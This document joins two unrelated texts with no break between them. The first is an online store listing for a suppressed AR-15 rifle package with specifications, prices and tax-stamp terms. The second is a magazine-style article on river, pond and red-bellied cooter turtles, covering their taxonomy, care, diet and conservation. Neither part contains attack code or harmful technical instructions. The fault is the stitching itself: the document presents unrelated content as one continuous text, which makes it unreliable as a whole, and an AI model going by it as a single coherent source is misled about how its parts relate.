Shopping Cart > Suppressors > Stingray ( R ) Stainless Steel 5.56 AR15 Rifle-Stingray ( R ) 10.5 556 10 '' HD Quad Rail SS Suppressor Rifle Your Price $ 1299.99 Upgrades / Optional Accessories : Rail Options ( Out Of Stock ) 10 '' Talon upgrade ( Out Of Stock ) + $ 89.99 15 '' HD Quad Rail ( Out Of Stock ) + $ 69.99 12 '' HD Quad Rail ( Out Of Stock ) + $ 39.99 No up grade10 '' HD Quad Rail ( Out Of Stock ) 15 '' Talon Rail ( Out Of Stock ) + $ 149.99 Out Of Stock Hardened Arms 10.5 '' Stingray Suppressor rifle package in 5.56 NATO utilizing our new 5.56mm stainless steel suppressor pinned to 16 '' . The mixed alloy 17-4 Stainless Steel can is designed to take the abuse of everyday use and stand up to the harshest of environments . Allowing for a compact weapon system with ultra-quiet usability . Whether you are on an entry team , defending your castle or hunting game in the plains of Wyoming , you can rest easy knowing your position will not be compromised when firing on the intended target . This compact pinned package allows for the upper to be run on a rifle lower without needing two tax stamps because it qualifies as a rifle ( $ 200 ATF tax stamp required for suppressor ) .
Rifle Specifications : ( No SBR Tax Stamp Required ) :
Hardened Arms M4 Feed Ramp Flat Top Receiver
Hardened Arms Mil-Spec 7075 Forged Lower
Black anodized mil-spec finished upper receiver
Feed ramps for increased feeding reliability on barrel and upper
Laser etched T-Marked upper receiver
10.5 '' 5.56mm Melonited 4150CMV Barrel ( Pinned to ATF compliant 16 '' + length )
.750 '' barrel diameter at gas block
1/2-28 threaded muzzle/barrel
Barrel dimpled to secure gas block
Carbine length gas system
10 '' Hardened Quad Rail
Mil-Spec Lower Parts Kit
Mil-Spec Diameter Collapsible Carbine Buffer Tube
M4 Standard Stock
Hardened Arms Stingray Suppressor Features : ( Tax Stamp Required ) :
Caliber : 5.56
Length : 6.4in
Weight : 18oz
Diameter : 1.490 in
Db Reduction : 31dB
Thread Size : 1/2x 28
Finish : 17-4 Stainless Steel
Style : Direct Thread ( Pinned + Welded )
The Stingray is nothing short of a durable , rugged thread mount suppression system for your modern-day rifle . It is a perfect marriage for a 10.5 barrel - making it the ideal companion to your SBR or PDW .
Machined here in America by Hardened Arms from the finest 17-4 stainless steel with brushed finish .
You are responsible for knowing your state laws regarding barrel lengths , pistol and short barreled rifle restrictions . 20 % restocking fees if you cancel anytime after you order , 30 % after form 3 paper work filed or can not take delivery due to state restriction . Dealer programs are available on our website . Two-year warranty against manufacturer defects . Finishes will wear with use , no warranties apply to finish wear .
Cooter Turtles
By Kurt A. Buhlmann
The cooters are a colorful and visible part of our aquatic biodiversity . hadot 760/Shutterstock
River cooters and pond cooters are large , aquatic , hard-shelled turtles , primarily found in the southeastern United States . However , there are some species also found in the southwest . Cooters — all turtles in the Pseudemys genus — also include the red-bellied turtles , which are similar in their habitats , behavior and food preferences .
Telling the cooters apart is often a tricky task for even experienced biologists . Often , knowing a specimen 's geographic origin is the best way to determine species . In the wild , where several cooter species come into contact with each other , they hybridize . Thus , many specimens that I have seen over the years are hybrids . In general , we can categorize the cooters as belonging to river , pond or red-bellied groups .
River Cooters
River cooters ( Pseudemys concinna ) are large turtles , reaching 13 inches and sometimes more in carapace length , with relatively flat shells that flare at the rear and are streamlined for riverine and other moving-water habitats . River cooters have a brown to black carapace , with reddish tinges , and the plastron is yellow , orange or reddish , with prominent patterns of orange and black . Sometimes the plastron 's margins are pinkish . The head stripes are yellow , but may even seem orange .
Turtle biologists do not agree on the numbers of unique river cooter taxa , and there are also questions about the uniqueness of the pond cooters ( Pseudemys floridana ) and whether they warrant species status independent of river cooters . At a subspecies level , the eastern river cooters ( P. concinna ) include the eastern river cooter ( P. c. concinna ) of the Atlantic drainages , the hieroglyphic river cooter ( P. c. hieroglyphica ) of the Tennessee River drainages , the Mobile Bay cooter ( P. c. mobilensis ) of the lower Gulf Coast region and the Suwannee River cooter ( P. c. suwanniensis ) of the Florida Peninsula . However , some authorities have considered the Suwannee River cooter to be a separate species , Pseudemys suwanniensis , rather than a subspecies . In the western U.S. , most authorities recognize the Texas River cooter ( P. texana ) of the Edwards Plateau in Texas and the Rio Grande cooter ( P. gorzugi ) of the Rio Grande of New Mexico and south Texas as distinct species .
River cooters , in general , are denizens of large rivers , where they prefer clear-flowing water with gravel and cobble bottoms , and beds of rooted aquatic plants , such as Elodea and eelgrass . River cooters are often abundant where rock ledges extend across river channels where the Piedmont physiographic region meets the Coastal Plain . When traveling some of the major interstate highways in the Southeast , one can see large numbers of river cooters basking on the rocks in the river below . Suwannee cooters are unique in that they are known to enter brackish waters ; individuals have been found with barnacles on their shells , suggesting a sustained period of saltwater visitation .
Pond Cooters
Pond cooters ( Pseudemys floridana ) are large like river cooters ( up to 13 inches ) , but have relatively higher-domed carapaces in front that taper off toward the rear . The carapace is generally brown to black with vague yellow markings , and the plastron is plain yellow with no dark or reddish markings . The head stripes range from being prominent and yellow to faint and greenish . The higher-domed shell of pond cooters may help prevent the adults from being crushed by large alligators , which they are more likely than river cooters to encounter .
The taxonomy of pond cooters is also in flux , but most biologists recognize two subspecies , the Florida cooter ( P. f. floridana ) , found from Virginia to Georgia , and the peninsular cooter ( P. f. peninsularis ) , found in Florida . Other biologists consider the peninsular cooter distinctive enough to warrant species designation ( P. peninsularis ) . At the other extreme , some biologists suggest that all pond cooters are simply subspecies of river cooters ( P. concinna ) .
Specimens classified as pond cooters are often found in slower-moving water than river cooters , and they are seen basking in cypress swamps and other floodplain habitats along the Coastal Plain sections of large southeastern rivers . Pond cooters often frequent seasonal wetlands and are more likely than river cooters to move overland . This is at least true for specimens found on the Savannah River Site in South Carolina . Cooters that fit the description of river cooters bask on the rocks in the Savannah River near Augusta , Ga. , whereas specimens that fit the description of pond cooters are seen in the cypress swamps downstream and are often caught in seasonal wetlands .
Red-Bellied Turtles
The third group of cooters includes the red-bellied turtles ( up to 121⁄2 inches in length ) , with three distinctive species recognized . All are characterized by broad , red stripes on the carapace and variable black and red patterning on the plastron . Red-bellied cooters can be distinguished from river and pond cooters by the serrated pattern on their jaws . A deep notch in the front of the upper jaw is flanked on both sides by conspicuous cusps . The head is streaked with thin yellow lines , one of which is centered between the eyes , ending near the nose to form an “ arrow . ”
All three red-bellied cooters are geographically isolated from each other . The northern red-bellied cooter ( P. rubriventris ) inhabits vegetation-choked permanent ponds from southern New Jersey to North Carolina , and it also has an isolated population in Massachusetts that was once recognized as separate taxa ( P. rubriventris bangsi ) . The Florida red-bellied cooter ( P. nelsoni ) is common in the Okefenokee Swamp in Georgia and many of the large springs and rivers in central Florida . The Alabama red-bellied cooter ( P. alabamensis ) is restricted to the lower Mobile Basin in Alabama and is listed as a federally threatened species .
Cooter Care
Captive cooter care is similar among the three groups ; however , the red-bellied cooters may be the most omnivorous , the river cooters primarily herbivorous and the pond cooters intermediate between the other two .
Cooters do well in aquariums and backyard ponds when the water is kept clean and filtered . However , keep in mind that cooters grow to large sizes . Adult river cooters can be big , with some females reaching 16 inches and weighing 8 to 11 pounds . They are generally larger than can be kept in an indoor aquarium setup . However , the males of most species are generally slightly smaller ( 9 to 10 inches ) than the females and may do well in large tanks or outdoor ponds . Cattle watering tanks , the 300-gallon size or larger , are needed to house an adult river cooter of either sex . Plastic tanks are preferable to metal , as cooters will make a racket in a metal tank . Water depth should be 1 to 2 feet or more for adults , but a basking and resting site must be provided . Be aware that the water temperature in summer in large outdoor , above-ground tanks can get too warm if not partially shaded . Upon maturity , males can be easily distinguished from females by their long foreclaws .
As avid baskers , cooters require a basking platform , a warming light source and full-spectrum UVB lighting if kept indoors . Provide a basking site of 85 degrees Fahrenheit and a water temperature of 75 degrees . Cooters are strong swimmers , particularly the river cooters , and a 3- to 4-inch juvenile can be kept in a 20- or 30-gallon aquarium , filled two-thirds to the top . The basking platform must allow cooters enough room to stretch out and fully dry their shell and plastron to avoid shell rot .
Cooters can be kept in fenced outdoor ponds that keep them in and predators out . In-ground , plastic-lined backyard ponds , measuring 5 feet long by 5 feet wide or more in size , work well for a pair . However , monitor pairs to make sure that the male is not consistently harassing the female . Many turtlekeepers only put their pairs together during the breeding season . Plastic-lined ponds are particularly nice , and the edges can be lined with smooth rocks to provide basking locations . Given that cooters are primarily herbivorous , it may be a challenge to keep potted aquatic plants , such as water lilies , from being consumed . However , cooters are less likely than other turtles to harass decorative fish . With the exception of pond cooters , which are often found in tannin-stained waters , the river and red-bellied cooters will prefer clear water .
What To Feed River Cooters
In general , all cooters are omnivorous as hatchlings and juveniles . I have raised hatchlings to 6 inches in size on a diet of ReptoMin and Mazuri Turtle Chow . Products that contain dried invertebrates and crustaceans , such as Gammare species , may enhance some of the red coloration found in some river and red-bellied species . I have seen juvenile red-bellied cooters eat insects , snails , crayfish , earthworms and tadpoles . Romaine lettuce makes a nice supplement that can be left for periods of time in the actual housing container . Other foods should be given in a separate feeding container to minimize water fouling .
As cooters mature , they become more herbivorous . Larger river cooters maintained in captivity prefer tortoise chow over turtle chow . In addition , they will accept romaine lettuce and other greens . In the wild , river cooters feed primarily on eelgrasses ( Vallisneria spp . ) and elodea ( Elodea spp ) . While snorkeling in clear stretches of the Savannah River , I 've seen large adult river cooters feeding on stands of eelgrass . Turtles will bite onto a large blade and then shred it as the river current pulls them downstream .
Pond cooters are known to eat aquatic plants commonly found in their more still-water habitats , including coontail , arrowhead and duckweed , as well as at least two introduced plants , water hyacinth and hydrilla . Red-bellied cooters will also eat water lilies and pickerelweed . Therefore , keeping cooters with aquatic plants in either indoor aquariums or outdoor ponds may prove a challenge .
Occasionally , river cooters consume crayfish in the wild , as demonstrated by the presence of crayfish parts in the fecal samples of wild-caught animals . Whether the cooters consumed the crayfish live or scavenged the shells is unknown . In any case , a calcium supplement , such as cuttlebone , should be provided for captive turtles — they will nibble on it as they desire . Adult river cooters seem to prefer Mazuri Tortoise Chow over the freshwater turtle diet ; in my experience , red-bellied cooters prefer the Mazuri Freshwater Turtle Diet .
Conservation Concerns
The river cooter is subject to environmental impacts , including unnatural flooding regimes due to upstream dams , aquatic pollution and intentional killing for sport by shooting ( called “ plinking ” ) cooters from basking sites . This , of course , is unacceptable and should be outlawed by state wildlife agencies . Many female cooters are killed annually on highways while searching for appropriate nesting habitat . The Suwannee cooter once occurred in large numbers in the Suwannee River system but has been reduced in number by harvest for food . The creation of large reservoirs on many southeastern rivers above the Fall Line has allowed the pond cooter to exist outside its native range where it may hybridize with the river cooter . Thus , the already confusing taxonomy of cooters may be even more difficult to understand because of human manipulations of their natural habitat .
Captive-Bred River Cooters
Conservation-minded turtlekeeping is achieved by buying captive-bred hatchlings from a reputable breeder . Removing adult cooters from the wild damages the long-term viability of turtle populations , and wild-caught cooters are skittish and powerful . They will quickly destroy any captive housing setup .
Clever Cooters
Pond cooters in South Carolina and Suwannee river cooters in Florida have been seen constructing “ satellite ” nests . The female digs one main chamber bordered by one or two satellite nests a few inches to each side . Most of the eggs are deposited into the main nest , but one to three may be deposited into each satellite hole . The precise significance of this nesting behavior has not been determined , but it may serve to mislead predators . Florida red-bellied cooters are known to deposit their eggs within the nests of rotting vegetation made by female alligators . When the female alligator guards her nest from predators , the cooter nest is also protected .
In Closing
The cooters are a colorful and visible part of our aquatic biodiversity . Close-up , their beauty is apparent , especially in the river and red-bellied forms . These animals often occur in large numbers in healthy rivers and ponds , thus playing important roles in aquatic ecosystem processes . Given that these turtles are highly active and live in extensive habitats ( rivers and swamps ) , those of us who choose to keep and appreciate them should consider their space requirements . And of course , observing them in the wild , such as by snorkeling with them or watching them through binoculars , is particularly rewarding and helps us better understand the roles they play in our environment .
